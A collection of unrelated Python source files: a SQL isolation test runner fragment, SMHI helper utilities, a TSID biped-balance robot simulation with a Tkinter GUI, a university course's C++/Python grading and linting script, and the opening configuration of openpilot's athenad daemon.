against the test case database (self.db_name) and verifies the output with the ans file.
If an 'init_file' exists in the same location as the sql_file, this will be used
while doing gpdiff.
"""
# Add gucs to the test sql and form the actual sql file to be run
if not out_dir:
out_dir = self.get_out_dir()
if not os.path.exists(out_dir):
TINCSystem.make_dirs(out_dir, ignore_exists_error = True)
if optimizer is None:
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file))
else:
# sql file will be <basename>_opt.sql or <basename>_planner.sql based on optimizer
gucs_sql_file = os.path.join(out_dir, os.path.basename(sql_file).replace('.sql', '_%s.sql' %self._optimizer_suffix(optimizer)))
self._add_gucs_to_sql_file(sql_file, gucs_sql_file, optimizer)
self.test_artifacts.append(gucs_sql_file)
if not out_file:
if optimizer is None:
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '.out'))
else:
# out file will be *_opt.out or *_planner.out based on optimizer
out_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_%s.out' %self._optimizer_suffix(optimizer)))
self.test_artifacts.append(out_file)
executor = SQLIsolationExecutor(dbname=self.db_name)
with open(out_file, "w") as f:
executor.process_isolation_file(open(sql_file), f)
f.flush()
if out_file[-2:] == '.t':
out_file = out_file[:-2]
return out_file
if __name__ == "__main__":
parser = OptionParser()
parser.add_option("--dbname", dest="dbname",
help="connect to database DBNAME", metavar="DBNAME")
(options, args) = parser.parse_args()
executor = SQLIsolationExecutor(dbname=options.dbname)
executor.process_isolation_file(sys.stdin, sys.stdout)
|
utils.py
|
#!/usr/bin/env python
# Copyright (c) 2022 SMHI, Swedish Meteorological and Hydrological Institute.
# License: MIT License (see LICENSE.txt or http://opensource.org/licenses/mit).
"""
Created on 2022-02-02 18:00
@author: johannes
"""
import numpy as np
from pathlib import Path
from collections import Mapping
from threading import Thread
from decimal import Decimal, ROUND_HALF_UP
def round_value(value: (str, int, float), nr_decimals=2) -> str:
"""Calculate rounded value."""
return str(Decimal(str(value)).quantize(
Decimal('%%1.%sf' % nr_decimals % 1),
rounding=ROUND_HALF_UP)
)
def decmin_to_decdeg(pos, decimals=4):
"""Convert degrees and decimal minutes into decimal degrees."""
pos = float(pos)
output = np.floor(pos / 100.) + (pos % 100) / 60.
return round_value(output, nr_decimals=decimals)
def get_base_folder():
"""Return the base folder of ODV-transformer."""
return Path(__file__).parent
def recursive_dict_update(d: dict, u: dict) -> dict:
"""Recursive dictionary update.
Copied from:
http://stackoverflow.com/questions/3232943/update-
value-of-a-nested-dictionary-of-varying-depth
via satpy
"""
for k, v in u.items():
if isinstance(v, Mapping):
r = recursive_dict_update(d.get(k, {}), v)
d[k] = r
else:
d[k] = u[k]
return d
def thread_process(call_function, *args, **kwargs):
"""Thread process.
Args:
call_function: function to use
args: Arguments to call_function
kwargs: Key word arguments to call_function
"""
Thread(target=call_function, args=args, kwargs=kwargs).start()
|
ex_3_biped_balance_with_gui.py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 17 22:31:22 2019
@author: student
"""
import numpy as np
import pinocchio as pin
import tkinter as tk
from tkinter import Scale, Button, Frame, Entry, Label, Tk, mainloop, HORIZONTAL
import threading
class Scale3d:
def __init__(self, master, name, from_, to, tickinterval, length, orient, command):
self.s = 3*[None]
axes = ['X','Y','Z']
for i in range(3):
self.s[i] = Scale(master, label=name+' '+axes[i], from_=from_[i], to=to[i],
tickinterval=tickinterval[i], orient=orient[i], length=length[i], command=command)
self.s[i].pack()
separator = Frame(height=2, bd=1, relief=tk.SUNKEN)
separator.pack(fill=tk.X, padx=5, pady=5)
def get(self):
return self.s[0].get(), self.s[1].get(), self.s[2].get()
class Entry3d:
def __init__(self, master, name):
self.s = 3*[None]
axes = ['X','Y','Z']
for i in range(3):
Label(master, text=name+" "+axes[i]).pack() #side=tk.TOP)
self.s[i] = Entry(master, width=5)
self.s[i].pack() #side=tk.BOTTOM)
separator = Frame(height=1, bd=1, relief=tk.SUNKEN)
separator.pack(fill=tk.X, padx=2, pady=2) #, side=tk.BOTTOM)
def get(self):
try:
return [float(self.s[i].get()) for i in range(3)]
except:
print("could not convert string to float", [self.s[i].get() for i in range(3)])
return 3*[0.0]
scale_com, scale_RF, scale_LF = None, None, None
button_contact_RF, button_contact_LF = None, None
push_robot_active, push_robot_com_vel, com_vel_entry = False, 3*[0.0], None
def update_com_ref_scale(value):
x, y, z = scale_com.get()
tsid.trajCom.setReference(com_0 + np.array([1e-2*x, 1e-2*y, 1e-2*z]).T)
def update_RF_ref_scale(value):
x, y, z = scale_RF.get()
H_rf_ref = H_rf_0.copy()
H_rf_ref.translation += + np.array([1e-2*x, 1e-2*y, 1e-2*z]).T
tsid.trajRF.setReference(H_rf_ref)
def update_LF_ref_scale(value):
x, y, z = scale_LF.get()
H_lf_ref = H_lf_0.copy()
H_lf_ref.translation += + np.array([1e-2*x, 1e-2*y, 1e-2*z]).T
tsid.trajLF.setReference(H_lf_ref)
def switch_contact_RF():
if(tsid.contact_RF_active):
tsid.remove_contact_RF()
button_contact_RF.config(text='Make contact right foot')
else:
tsid.add_contact_RF()
button_contact_RF.config(text='Break contact right foot')
def switch_contact_LF():
if(tsid.contact_LF_active):
tsid.remove_contact_LF()
button_contact_LF.config(text='Make contact left foot')
else:
tsid.add_contact_LF()
button_contact_LF.config(text='Break contact left foot')
def toggle_wireframe_mode():
tsid.gui.setWireFrameMode('world', 'WIREFRAME')
def push_robot():
global push_robot_com_vel, push_robot_active
push_robot_com_vel = com_vel_entry.get()
push_robot_active = True
def create_gui():
"""thread worker function"""
global scale_com, scale_RF, scale_LF, button_contact_RF, button_contact_LF, com_vel_entry
master = Tk(className='TSID GUI')
scale_com = Scale3d(master, 'CoM', [-10,-15,-40], [10,15,40], [5,5,10], [200,250,300],
3*[HORIZONTAL], update_com_ref_scale)
scale_RF = Scale3d(master, 'Right foot', 3*[-30], 3*[30], 3*[10], 3*[300],
3*[HORIZONTAL], update_RF_ref_scale)
scale_LF = Scale3d(master, 'Left foot', 3*[-30], 3*[30], 3*[10], 3*[300],
3*[HORIZONTAL], update_LF_ref_scale)
button_contact_RF = Button(master, text='Break contact right foot', command=switch_contact_RF)
button_contact_RF.pack(side=tk.LEFT)
button_contact_LF = Button(master, text='Break contact left foot', command=switch_contact_LF)
button_contact_LF.pack(side=tk.LEFT)
Button(master, text='Toggle wireframe', command=toggle_wireframe_mode).pack(side=tk.LEFT)
# Frame(height=2, bd=1, relief=tk.SUNKEN).pack(fill=tk.X, padx=5, pady=5)
Button(master, text='Push robot CoM', command=push_robot).pack()
com_vel_entry = Entry3d(master, 'CoM vel')
mainloop()
return
import numpy as np
import time
import romeo_conf as conf
from tsid_biped import TsidBiped
def run_simu():
global push_robot_active
i, t = 0, 0.0
q, v = tsid.q, tsid.v
time_avg = 0.0
while True:
time_start = time.time()
tsid.comTask.setReference(tsid.trajCom.computeNext())
tsid.postureTask.setReference(tsid.trajPosture.computeNext())
tsid.rightFootTask.setReference(tsid.trajRF.computeNext())
tsid.leftFootTask.setReference(tsid.trajLF.computeNext())
HQPData = tsid.formulation.computeProblemData(t, q, v)
sol = tsid.solver.solve(HQPData)
if(sol.status!=0):
print("QP problem could not be solved! Error code:", sol.status)
break
# tau = tsid.formulation.getActuatorForces(sol)
dv = tsid.formulation.getAccelerations(sol)
q, v = tsid.integrate_dv(q, v, dv, conf.dt)
i, t = i+1, t+conf.dt
if(push_robot_active):
push_robot_active = False
data = tsid.formulation.data()
if(tsid.contact_LF_active):
J_LF = tsid.contactLF.computeMotionTask(0.0, q, v, data).matrix
else:
J_LF = np.zeros((0,tsid.model.nv))
if(tsid.contact_RF_active):
J_RF = tsid.contactRF.computeMotionTask(0.0, q, v, data).matrix
else:
J_RF = np.zeros((0,tsid.model.nv))
J = np.vstack((J_LF, J_RF))
J_com = tsid.comTask.compute(t, q, v, data).matrix
A = np.vstack((J_com, J))
b = np.vstack((np.array(push_robot_com_vel).T, np.zeros((J.shape[0],1))))
v = np.linalg.lstsq(A, b, rcond=-1)[0]
if i%conf.DISPLAY_N == 0:
tsid.robot_display.display(q)
x_com = tsid.robot.com(tsid.formulation.data())
x_com_ref = tsid.trajCom.getSample(t).pos()
H_lf = tsid.robot.position(tsid.formulation.data(), tsid.LF)
H_rf = tsid.robot.position(tsid.formulation.data(), tsid.RF)
x_lf_ref = tsid.trajLF.getSample(t).pos()[:3]
x_rf_ref = tsid.trajRF.getSample(t).pos()[:3]
tsid.gui.applyConfiguration('world/com', x_com.tolist()+[0,0,0,1.])
tsid.gui.applyConfiguration('world/com_ref', x_com_ref.tolist()+[0,0,0,1.])
tsid.gui.applyConfiguration('world/rf', pin.SE3ToXYZQUATtuple(H_rf))
tsid.gui.applyConfiguration('world/lf', pin.SE3ToXYZQUATtuple(H_lf))
tsid.gui.applyConfiguration('world/rf_ref', x_rf_ref.tolist()+[0,0,0,1.])
tsid.gui.applyConfiguration('world/lf_ref', x_lf_ref.tolist()+[0,0,0,1.])
if i%1000==0:
print("Average loop time: %.1f (expected is %.1f)"%(1e3*time_avg, 1e3*conf.dt))
time_spent = time.time() - time_start
time_avg = (i*time_avg + time_spent) / (i+1)
if(time_avg < 0.9*conf.dt): time.sleep(conf.dt-time_avg)
print("".center(conf.LINE_WIDTH,'#'))
print(" Test Task Space Inverse Dynamics ".center(conf.LINE_WIDTH, '#'))
print("".center(conf.LINE_WIDTH,'#'), '\n')
tsid = TsidBiped(conf)
com_0 = tsid.robot.com(tsid.formulation.data())
H_rf_0 = tsid.robot.position(tsid.formulation.data(), tsid.model.getJointId(conf.rf_frame_name))
H_lf_0 = tsid.robot.position(tsid.formulation.data(), tsid.model.getJointId(conf.lf_frame_name))
tsid.gui.addSphere('world/com', conf.SPHERE_RADIUS, conf.COM_SPHERE_COLOR)
tsid.gui.addSphere('world/com_ref', conf.REF_SPHERE_RADIUS, conf.COM_REF_SPHERE_COLOR)
tsid.gui.addSphere('world/rf', conf.SPHERE_RADIUS, conf.RF_SPHERE_COLOR)
tsid.gui.addSphere('world/rf_ref', conf.REF_SPHERE_RADIUS, conf.RF_REF_SPHERE_COLOR)
tsid.gui.addSphere('world/lf', conf.SPHERE_RADIUS, conf.LF_SPHERE_COLOR)
tsid.gui.addSphere('world/lf_ref', conf.REF_SPHERE_RADIUS, conf.LF_REF_SPHERE_COLOR)
th_gui = threading.Thread(target=create_gui)
th_gui.start()
th_simu = threading.Thread(target=run_simu)
th_simu.start()
|
curl_grading.py
|
"""curl_grading.py: tools for analyzing and checking C++ and Py programs"""
import subprocess as sub
import difflib
import unittest
import re
import tokenize
import dis
import io
import cpplint
import sys
import pycodestyle
import logging
import os
import random
import importlib
import multiprocessing
from io import StringIO
import time
from subprocess import PIPE,Popen,run,TimeoutExpired
DEBUG = False
# 1.1 incorporate new checker from fall 2020
# 1.2 fix style point handling
# 1.3 fix Penalty, and allows argv[]
# 1.4 update compile return
# 2.0 switch to Points/MaxPoints to allow for more partial points
# 2.1 move testorder functionality in to setupClass
# 2.2 some format improvements in grade reporting
# 2.3 case sensitive check for file systems.
# 2.4 allow for no Penalty in testcase
# 2.5 improved case text handling
# 2.6 add self.authors
# 3.0 rename curl_grading.py
# 3.1 improve the bracket counting
VERSION = (3, 1)
path = os.environ['PATH']
if path.startswith(".:") or path.endswith(":.") or ":.:" in path:
pass # path ok
else:
print("""Your path is not set correctly. The checker will not work
unless you add "." the current working directory to your PATH.
You can do this by editing ~/.zshrc
""",file=sys.stderr)
sys.exit(42)
class TimeoutException(Exception):
pass
class RunableProcessing(multiprocessing.Process):
def __init__(self, func, *args, **kwargs):
self.queue = multiprocessing.Queue(maxsize=1)
args = (func,) + args
multiprocessing.Process.__init__(self, target=self.run_func, args=args, kwargs=kwargs)
def run_func(self, func, *args, **kwargs):
try:
result = func(*args, **kwargs)
self.queue.put((True, result))
except Exception as e:
self.queue.put((False, e))
def done(self):
return self.queue.full()
def result(self):
return self.queue.get()
def timeout(seconds, force_kill=True):
def wrapper(function):
def inner(*args, **kwargs):
now = time.time()
proc = RunableProcessing(function, *args, **kwargs)
proc.start()
proc.join(seconds)
if proc.is_alive():
if force_kill:
proc.terminate()
runtime = int(time.time() - now)
raise TimeoutException('timed out after {0} seconds'.format(runtime))
assert proc.done()
success, result = proc.result()
if success:
return result
else:
raise result
return inner
return wrapper
STDLINT = ['-readability/alt_tokens',"+build/include_alpha"]
ignore_lint = [x[1:] for x in STDLINT if x.startswith('-')]
ASTYLE_OPTIONS = [
'--style=google', '--indent=spaces=2', '--formatted', '--dry-run'
]
COMMENT_STRING = {'py': '#', 'sh': "#", 'cpp': '//'}
#CPP_CODE_ONLY = [
# 'g++', '-std=c++14', '-P', '-x', 'c++', '-dD', '-E', '-fpreprocessed'
#]
def silent_import(fname, q):
s = StringIO()
sys.stdout = s
themod = None
try:
themod = importlib.import_module(fname)
except Exception as e:
q.put("fail")
return
q.put("success")
def my_import(modname, code):
filename = modname+".py"
with open(filename,'w') as f:
f.write(code)
q = multiprocessing.Queue()
T = multiprocessing.Process(target=silent_import,args=(modname, q))
T.start()
try:
result = q.get(True,1)
except Exception as e:
repeat_terminate(T,0.1)
return False
if result=="success":
return importlib.import_module(modname)
return False
def safe_remove(filename):
try:
os.remove(filename)
except Exception as e:
print(e)
def numbers_only(word_lines):
rr=[]
for v in word_lines:
g=v.split()
nums=[]
for x in g:
try:
nums.append(int(x))
except:
try:
nums.append(float(x))
except:
pass
rr.append(nums)
return rr
bracket_msg="""It is recommended to avoid the use of brackets in C++, i.e., these [ ] or these <: :>
a) Use .at() or other methods instead
b) replace c-style arrays with vectors or strings etc
c) if you must use a c-style array (e.g. argv) use pointers
You have {} brackets.
"""
report_msg="""
===============================
Checking {course} {prog}.
{version}
================================
Information
-----------
{info}
Passed Tests
------------
{passed}
Failed Tests
------------
{failed}
Grading
-------
{grade}"""
AUTHWARN = "WARNING, NO VALID AUTHOR LINES FOUND"
def setup_py(cls, prefix):
with open(cls.realfilename) as f:
cls.file_contents=f.read()
cls.module_name = prefix+str(random.randint(1000,100000))
cls.module_tested = my_import(cls.module_name, cls.file_contents)
if not cls.module_tested:
safe_remove(cls.module_name+".py")
raise unittest.SkipTest(f'During test of {cls.__doc__}, unable to import your module. Timeout or error')
def compile_main(cls,prefix):
if not hasattr(cls,'lintoptions'):
cls.lintoptions = STDLINT
try:
with open(cls.realfilename) as f:
cls.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile_main, {cls.realfilename} not found.")
cls.executable = prefix+str(random.randint(1000,100000))
cls.new_source_file_main = cls.executable + ".cpp"
with open(cls.new_source_file_main,'w') as f:
f.write(cls.file_contents_main)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',
cls.new_source_file_main,"-o",cls.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
self.executable = None
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(cls.new_source_file_main)
cls.code_metrics = code_analysis_cpp(cls.realfilename,cls.lintoptions)
return T.stderr
def compile_separate(cls,prefix):
if not hasattr(cls,'lintoptions'):
cls.lintoptions = STDLINT
try:
with open(cls.realfilename) as f:
cls.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile_separate, {cls.realfilename} not found.")
cls.executable = prefix+str(random.randint(1000,100000))
cls.new_source_file_main = cls.executable + ".cpp"
with open(cls.new_source_file_main,'w') as f:
f.write(cls.file_contents_main)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',
cls.realfilename,cls.new_source_file_main,"-o",cls.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(cls.new_source_file_main)
cls.code_metrics = code_analysis_cpp(cls.realfilename,cls.lintoptions)
def compile(self,prefix):
if not hasattr(self,'lintoptions'):
self.lintoptions = STDLINT
try:
with open(self.realfilename) as f:
self.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile, {self.realfilename} not found.")
self.executable = prefix+str(random.randint(1000,100000))
new_source_file = self.executable + ".cpp"
with open(new_source_file,'w') as f:
f.write(self.file_contents)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',new_source_file,"-o",self.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(new_source_file)
self.code_metrics = code_analysis_cpp(self.realfilename,self.lintoptions)
return (T.returncode,T.stderr)
def compile_and_run(self,prefix):
compile(self,prefix)
try:
T = sub.run([self.executable],stdout=sub.PIPE,stderr=sub.PIPE,timeout=1,universal_newlines=True)
except Exception as e:
safe_remove(self.executable)
raise unittest.SkipTest("Failed to run.\n"+str(e))
self.output = T.stdout
self.errors = T.stderr
def bracket_check(self):
"brackets. check for brackets"
bracket_count = self.code_metrics['brackets']
if bracket_count:
self.fail(bracket_msg.format(bracket_count))
def test_includes(self):
"libraries. check the included libraries are allowed"
includes = get_includes(self.file_contents)
self.msgs.append('included libraries : {}\n'.format(" ".join(includes) if includes else "None"))
if self.valid_includes=="Any":
return
invalid_includes = includes - self.valid_includes
if invalid_includes:
self.fail('Invalid includes: {}'.format(" ".join(x for x in invalid_includes)))
def test_imports(self):
"libraries. check the imported modules are allowed"
includes = get_python_imports(self.file_contents)
self.msgs.append('imported modules : {}\n'.format(" ".join(includes) if includes else "None"))
if self.valid_includes=="Any":
return
invalid_includes = includes - self.valid_includes
if invalid_includes:
self.fail('Invalid imports: {}'.format(" ".join(x for x in invalid_includes)))
def test_libraries(self):
"libraries. check the included libraries/modules are allowed"
if self.program.endswith('cpp'):
test_includes(self)
else:
test_imports(self)
def test_authors(self):
"authors. check on authors' emails identified"
authors = get_authors(self.file_contents, progtype(self.realfilename))
self.authors = authors[:]
self.msgs.append('authors : {}\n'.format(" ".join(authors)
if authors else AUTHWARN))
if len(authors)==0:
self.fail('No authors found in your document.')
elif len(authors) > self.authorlimit:
self.fail('Author limit {self.authorlimit} exceeded.')
def test_pystyle(self):
"style. python code style and analysis"
proc_pycodestyle = sub.run(['pycodestyle', self.realfilename], stdout=sub.PIPE)
prob = False
if proc_pycodestyle.returncode:
prob = proc_pycodestyle.stdout.decode().rsplit(" ", 1)[-1].strip()
self.msgs.append("pycodestyle check: {}\n".format("{} problems".format(
len(proc_pycodestyle.stdout.decode().splitlines())) if prob else "ok"))
proc_pylint = sub.run(
['pylint', self.realfilename], stdout=sub.PIPE,stderr=sub.PIPE)
pylint_report = proc_pylint.stdout.decode().splitlines()
if len(pylint_report)<2:
logging.error('bad pylint_report'+proc_pylint.stdout.decode())
pylint_score = 0
elif "previous" in pylint_report[-2]:
pylint_score=pylint_report[-2].split()[6]
else:
pylint_score = pylint_report[-2].split()[-1]
self.msgs.append("pylint score : {}\n".format(pylint_score))
code_metrics = code_analysis_py(self.file_contents)
self.msgs.append(code_size_report(code_metrics, self.refcode))
comments = 0
for line in self.file_contents.splitlines():
if '#' in line:
comments += 1
self.msgs.append("comments : {}\n".format(comments))
def test_cppstyle(self):
"style. C++ code style and analysis"
comments = 0
for line in self.file_contents.splitlines():
if '//' in line:
comments += 1
cm = self.code_metrics
if cm['errors']:
numerrors=sum(len(x) for x in cm['errors'].values())
self.msgs.append(f"cpplint : {numerrors} problems")
cpplint_call_list = [
'cpplint', '--filter=' + ','.join(self.lintoptions), self.__doc__
]
self.msgs.append(' [using {}]\n\n'.format(' '.join(cpplint_call_list)))
for e in cm['errors']:
for x in cm['errors'][e]:
self.msgs.append(' line {} ({}): {}'.format(*x))
else:
self.msgs.append("cpplint : ok")
self.msgs.append(f"astyle : {cm['astyle']:.1%} code unchanged.")
self.msgs.append(code_size_report(cm, self.refcode))
self.msgs.append(f"comments : {comments}")
stylegrade(self)
def stylegrade(cls):
cls.stylemax=cls.Points['style']
try:
D = cls.code_metrics['errors']
except Exception as e:
cls.fail(cls,f'Something went wrong: {e}')
cpplint_count= sum(len(D[x]) for x in D)
as_grade = 5*cls.code_metrics['astyle']
cls.msgs.append(f"astyle[max 5] {as_grade:.2f}")
lint_grade = max(0, 5-cpplint_count)
cls.msgs.append(f"cpplint[max 5] {lint_grade} (1 point deduction for each problem)")
cls.Points['style'] = round(as_grade + lint_grade,2)
cls.msgs.append(f"overall style grade[max 10] {cls.Points['style']:.2f}")
def test_style(self):
"style. test program style"
if self.program.endswith('cpp'):
test_cppstyle(self)
elif self.program.endswith('py'):
test_pystyle(self)
else:
self.msgs.append(f'Dont now how to check style of {self.program}')
def read_file(filename):
"read the contents of filename into string"
filehand = open(filename)
contents = filehand.read()
filehand.close()
return contents
def read_file_for_cpplint(filename):
"read the contents of filename into list of strings"
filehand = open(filename)
contents = filehand.read()
filehand.close()
lines = contents.splitlines()
if contents.endswith('\n'):
lines.append('')
return lines
def make_grades(gradesummary,cls,special_str="",spec_grade=0):
grade = 0
grade_report = special_str
grade_report += "\n"
for test in sorted(cls.Points):
if cls.Points[test]==int(cls.Points[test]):
grade_report += f" {test}({cls.Points[test]} / {cls.MaxPoints[test]})\n"
else:
grade_report += f" {test}({cls.Points[test]:.2f} / {cls.MaxPoints[test]})\n"
grade += cls.Points[test]
grade_report += "\n"
if hasattr(cls,"Penalty"):
for test in cls.Penalty:
if test in gradesummary['fail']:
grade_report += "Penalty for failed test {}: {}\n".format(test,cls.Penalty[test])
grade -= cls.Penalty[test]
grade = max(grade+spec_grade,0)
grade_report += f"\nGrade: {grade:5.2f}"
return grade, grade_report
def code_analysis_cpp(program_filename,lintoptions):
ignore_lint = [x[1:] for x in lintoptions if x.startswith('-')]
Errors = {}
def error_fcn(filename,line_number,lint_type,level,message):
category,subcategory = lint_type.split('/')
if category not in Errors:
Errors[category]=[]
Errors[category].append( (line_number,lint_type,message) )
lines = read_file_for_cpplint(program_filename)
cpplint.RemoveMultiLineComments(program_filename,lines,error_fcn)
clean_lines = cpplint.CleansedLines(lines)
cpplint.ProcessFileData(program_filename,'cpp',lines,error_fcn)
the_lines = [x for x in clean_lines.lines if x]
num_lines=len(the_lines)
num_words = sum(len(x.split()) for x in the_lines)
num_brackets = sum(x.count('[') for x in the_lines)
num_brackets += sum(x.count('<:') for x in the_lines)
num_brackets -= sum(x.count('argv[') for x in the_lines)
original = read_file(program_filename)
proc_astyle = sub.run(
['astyle', *ASTYLE_OPTIONS],
input=original.encode(),
stdout=sub.PIPE,
stderr=sub.PIPE)
if proc_astyle.returncode:
unchanged='error'
else:
original = original.splitlines()
newprog = proc_astyle.stdout.decode().splitlines()
matcher = difflib.SequenceMatcher()
matcher.set_seqs(original, newprog)
unchanged = matcher.ratio()
RealErrors={}
for e in Errors:
RealErrors[e]=[]
for x in Errors[e][:3]:
ignore=False
for s in ignore_lint:
if x[1] in s:
ignore=True;
if not ignore:
RealErrors[e].append(x)
if not RealErrors[e]:
del RealErrors[e]
return {'brackets':num_brackets,
'lines': num_lines,
'words': num_words,
'errors':RealErrors,
'astyle':unchanged}
def isstring(x):
x=x.strip()
if not x:
return True
elif x.startswith('#'):
return True
elif x.startswith('"""') and x.endswith('"""'):
return True
elif x.startswith("'''") and x.endswith("'''"):
return True
elif x.startswith('"') and x.endswith('"'):
return True
elif x.startswith("'") and x.endswith("'"):
return True
def code_analysis_py(program_contents):
"count lines and words in python"
# remove docstrings
for search_str in ('\"\"\"[^\"]*\"\"\"',"\'\'\'[^\']*\'\'\'"):
for x in re.findall(search_str,program_contents,flags=re.MULTILINE|re.DOTALL):
program_contents = program_contents.replace(x,'')
srclines=program_contents.splitlines()
# remove single line strings.
srclines = [x for x in program_contents.splitlines() if not isstring(x)]
src ="\n".join(srclines)
#print(src)
return {'lines': len(src.splitlines()), 'words': len(src.split())}
pylint_options=["--enable=all","--reports=yes","--persistent=no",
"--msg-template='{category:10s}:{line:3d},{column:2d}: {msg} ({symbol})'"]
def pylint_check(program_name):
process = sub.run(['pylint',program_name,*pylint_options],
stdout=sub.PIPE,universal_newlines=True)
out_str = process.stdout
for scoreline in out_str.splitlines()[-4:]:
try:
score = float(re.search('Your code has been rated at ([\d|\.]*)/10',scoreline).groups()[0])
return score, out_str
except:
pass
raise ValueError('could not get your pylint score')
def pycodestyle_check(filename):
"run pycodestyle, return #errors and error string"
pycodestyle_res = io.StringIO()
sys.stdout = pycodestyle_res
pycodestyle_errors = pycodestyle.Checker(filename).check_all()
sys.stdout = sys.__stdout__
res = pycodestyle_res.getvalue()
return pycodestyle_errors,res
def progtype(program):
"which type, cpp or py"
try:
_, program_type = program.split('.')
except:
return "sh"
return program_type
def get_includes(file_contents):
"get included libraries in C/C++"
includes = set()
for line in file_contents.lower().splitlines():
text = line.strip()
search_str = r"#include\s*<(.*)>"
matches = re.match(search_str, text)
if matches:
includes.add(matches.group(1))
matches = re.match("#include \"(.*)\"", text)
if matches:
includes.add(matches.group(1))
return includes
def get_python_imports(file_contents):
"get the imports of file_contents as a set"
try:
instructions = dis.get_instructions(file_contents)
imports = [__ for __ in instructions if 'IMPORT' in __.opname]
except:
return {'ERROR PROCESSING PYTHON SCRIPT'}
grouped = set()
for instr in imports:
if instr.opname == "IMPORT_NAME":
grouped.add(instr.argval)
return grouped
def get_authors(file_contents, ptype,buedu=True):
"""get the authors in file_contents"""
authors = []
if ptype == 'json':
A = json.loads(file_contents)
return A.get('authors',[])
for line in file_contents.lower().splitlines():
if line.startswith(COMMENT_STRING[ptype]) and "copyright" in line:
try:
_, email = line.strip().rsplit(" ", 1)
if email.endswith('@bu.edu'):
authors.append(email if buedu else email.split("@")[0])
elif email.endswith('\r'):
authors.append('DONT_USE_WINDOWS_ENDLINES')
except:
pass
return authors
def check_program(testclass,course=None,email=None,versioninfo=None,theprog=None):
"""return any errors as a list of strings"""
errors = []
passed = []
gradesummary = {'pass': [], 'fail': []}
testclass.realfilename = theprog
if hasattr(testclass, "setUpClass"):
try:
testclass.setUpClass()
except Exception as e:
return f"{testclass} setup fail {e}",0
loader = unittest.loader.TestLoader()
tests = loader.loadTestsFromTestCase(testclass)
def f(test,order):
testname=test.shortDescription().split('.')[0]
i = order.index(testname)
return i
if hasattr(testclass,"testorder"):
alltests = sorted(tests,key=lambda x: f(x,testclass.testorder))
else:
alltests = sorted(tests, key=lambda x: x.shortDescription())
for test in alltests:
#if testclass.program.endswith('py') and test.shortDescription().startswith('bracket'):
# continue
if DEBUG: print('running test:' ,test.shortDescription())
run = test.run()
if run.wasSuccessful():
thetest = test.shortDescription().split('.')[0]
if thetest != 'style':
passed.append('{}\n'.format(test.shortDescription()))
gradesummary['pass'].append(test.shortDescription().split('.')[0])
else:
err = f'\n{test.shortDescription()}\n'
for testmsg, res in run.failures + run.errors:
casetext = re.search(".*CASE=(.*)\)", str(testmsg))
if casetext:
err += "\nCASE: {}\n".format(casetext.group(1)[1:-1])
if 'AssertionError:' in res:
_, msg = res.split('AssertionError: ')
else:
msg = res
err += msg
errors.append(err)
gradesummary['fail'].append(test.shortDescription().split('.')[0])
if hasattr(testclass, "tearDownClass"):
testclass.tearDownClass()
if 'style' in testclass.Points:
if testclass.stylemax != testclass.Points['style']:
errors.append('style errors')
else:
gradesummary['pass'].append('style')
grade, grade_report = make_grades(gradesummary,testclass)
msg = report_msg.format(info="\n".join(testclass.msgs),
passed=''.join(passed) if passed else "None",
failed=''.join(errors) if errors else "None",
grade = grade_report,
prog = testclass.__doc__,
version = versioninfo or "",
email =email or "",
course=course)
return msg, grade
EMPTYGRADE = {'pass': [], 'fail': []}
def errors_msg(errors):
"format error message"
msg = '-----------------errors found--------------\n'
for testmsg in errors:
msg += testmsg + "\n-------\n"
return msg
SIZE_REPORT_TEMPLATE = """lines of code : {}, {:4.0%} of reference
tokens in code : {}, {:4.0%} of reference
"""
def code_size_report(submitted_code, reference_code):
"generate message about code size"
return SIZE_REPORT_TEMPLATE.format(
submitted_code['lines'],
submitted_code['lines'] / reference_code['lines'],
submitted_code['words'],
submitted_code['words'] / reference_code['words'])
def pyshell(Parms,q):
summary, results, gradesummary = overallpy(**Parms)
q.put([summary,results,gradesummary])
def check_program_shell(Parms,q):
q.put(check_program(**Parms))
def case_sensitive():
"is the file system case sensitive?"
fname = f"testing_{random.randint(1_000_000,2_000_000)}"
os.mkdir(fname)
try:
os.mkdir(fname.upper())
os.rmdir(fname.upper())
except:
return False
finally:
os.rmdir(fname)
return True
|
athenad.py
|
#!/usr/bin/env python3
import base64
import hashlib
import io
import json
import os
import sys
import queue
import random
import select
import socket
import threading
import time
from collections import namedtuple
from functools import partial
from typing import Any
import requests
from jsonrpc import JSONRPCResponseManager, dispatcher
from websocket import ABNF, WebSocketTimeoutException, WebSocketException, create_connection
import cereal.messaging as messaging
from cereal.services import service_list
from common.api import Api
from common.file_helpers import CallbackReader
from common.basedir import PERSIST
from common.params import Params
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE, PC
from selfdrive.loggerd.config import ROOT
from selfdrive.loggerd.xattr_cache import getxattr, setxattr
from selfdrive.swaglog import cloudlog, SWAGLOG_DIR
from selfdrive.version import get_version, get_origin, get_short_branch, get_commit
ATHENA_HOST = os.getenv('ATHENA_HOST', 'wss://athena.comma.ai')
HANDLER_THREADS = int(os.getenv('HANDLER_THREADS', "4"))
LOCAL_PORT_WHITELIST = set([8022])
LOG_ATTR_NAME = 'user.upload'
LOG_ATTR_VALUE_MAX_UNIX_TIME = int.to_bytes(2147483647, 4, sys.byteorder)
RECONNECT_TIMEOUT_S = 70
RETRY_DELAY = 10 # seconds
MAX_RETRY_COUNT = 30 # Try for at most 5 minutes if upload fails immediately
WS_FRAME_SIZE = 4096
dispatcher["echo"] = lambda s: s
recv_queue: Any = queue.Queue()
send_queue: Any = queue.Queue()
upload_queue: Any = queue.Queue()
log_send_queue: Any = queue.Queue()
